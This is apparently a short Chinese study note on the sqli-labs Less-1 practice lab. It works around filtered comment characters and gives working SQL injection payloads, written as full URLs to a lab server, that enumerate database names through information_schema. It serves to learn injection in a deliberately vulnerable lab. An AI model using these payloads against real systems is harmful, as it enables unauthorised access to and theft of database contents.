@[toc]
-
问题
- http://43.247.91.228:84/Less-1/
- 以上述连接为例。即sql-labs的第一个。sql语句为 select username,password from table whrere id = 'input'
-
闭合条件为?id=1' --+ ,如果注释符被过滤,那么闭合条件就会变为?id=1' and '1 (note:不能用or,会导致永真效果)
- 此时缺产生了一个致命的问题,即查找数据库出错
-
http://43.247.91.228:84/Less-1/?id=1%27%20union%20select%201,group_concat%28schema_name%29,3%20from%20information_schema.schemata%20and%20%271
-
解决方法
- 换另一个查找所有数据库的构造语句。
- union select 1,group_concat(table_schema),3 from information_schema.tables group by table_schema
- http://43.247.91.228:84/Less-1/?id=0%27%20union%20select%201,group_concat(table_schema),3%20from%20information_schema.tables%20group%20by%20table_schema%20and%20%271
- 打开f12复制下来爆出数据库,虽然有很多重复的字段,但是能看到所有的数据库。